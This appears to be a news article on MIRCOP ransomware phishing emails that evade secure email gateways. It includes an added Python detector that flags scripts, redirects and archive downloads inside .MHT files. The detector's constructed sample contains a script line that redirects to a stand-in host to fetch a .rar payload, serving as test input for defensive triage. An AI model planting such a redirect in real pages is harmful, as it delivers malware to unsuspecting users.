Ransomware Phishing Emails Sneak Through SEGs

The MIRCOP ransomware spreads via Google Drive and locally stored passwords.

Secure email gateway (SEG) protections aren’t necessarily enough to stop phishing emails from delivering ransomware to employees, especially if the cybercrooks are using legitimate cloud services to host malicious pages.

Researchers are raising the alarm over a phishing email that kicks off a Halloween-themed MIRCOP ransomware offensive, which they observed reaching a target's inbox even though that inbox was protected by an SEG.

Infection Routine

The original email purported to need support for a “DWG following Supplies List,” which is supposedly hyperlinked to a Google Drive URL. The URL is actually an infection link that downloads an .MHT file.

“.MHT file extensions are commonly used by web browsers as a webpage archive,” Cofense researchers explained. “After opening the file the target is presented with a blurred out and apparently stamped form, but the threat actor is using the .MHT file to reach out to the malware payload.”

That payload comes in the form of a downloaded .RAR file, which in turn contains an .EXE file.
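An .MHT file is a MIME multipart/related archive, so a mail or sandbox pipeline can triage it with a MIME parser before anyone renders it. The Python below is an added example for this article, not Cofense's or Threatpost's code; the sample archive and the `example.test` URLs in it are constructed, and the chain it mimics is the one described above (a blurred "form" whose HTML reaches out for an archive).

```python
import email
import re
from email import policy

# Constructed sample for this example, not a file from the campaign.
SAMPLE_MHT = """\
Subject: Constructed sample
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_B"

------=_B
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="https://example.test/blurred_form.png">
<script>location.href = 'https://example.test/SuppliesList.rar';</script>
</body></html>
------=_B--
"""

ANY_URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
RISKY_EXT = (".rar", ".zip", ".7z", ".exe", ".vbs", ".js", ".hta", ".scr")


def html_parts(mht_text):
    """Decoded text/html bodies of a .MHT archive (it is MIME multipart/related)."""
    msg = email.message_from_string(mht_text, policy=policy.default)
    return [p.get_content() for p in msg.walk()
            if p.get_content_type() == "text/html"]


def external_urls(mht_text):
    """Every http(s) URL an HTML part would fetch when rendered (cid: parts are not external)."""
    urls = set()
    for body in html_parts(mht_text):
        urls.update(ANY_URL_RE.findall(body))
    return urls


def indicators(mht_text):
    """Flag behaviours a saved, static 'form' has no business showing."""
    findings = []
    for body in html_parts(mht_text):
        low = body.lower()
        if "<script" in low:
            findings.append("inline script")
        if re.search(r"""<meta[^>]+http-equiv\s*=\s*["']?refresh""", low):
            findings.append("meta refresh redirect")
    for url in sorted(external_urls(mht_text)):
        if url.lower().endswith(RISKY_EXT):
            findings.append("fetches archive/executable: " + url)
    return findings
```

A saved web page that is really just a picture of a stamped form should have no script, no redirect and no outbound fetch of an archive, so any non-empty `indicators()` result is worth holding the message for review.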

“The executable is a DotNETLoader that uses VBS scripts to drop and run the MIRCOP ransomware in memory,”

Read More: https://threatpost.com/ransomware-phishing-emails-segs/176470/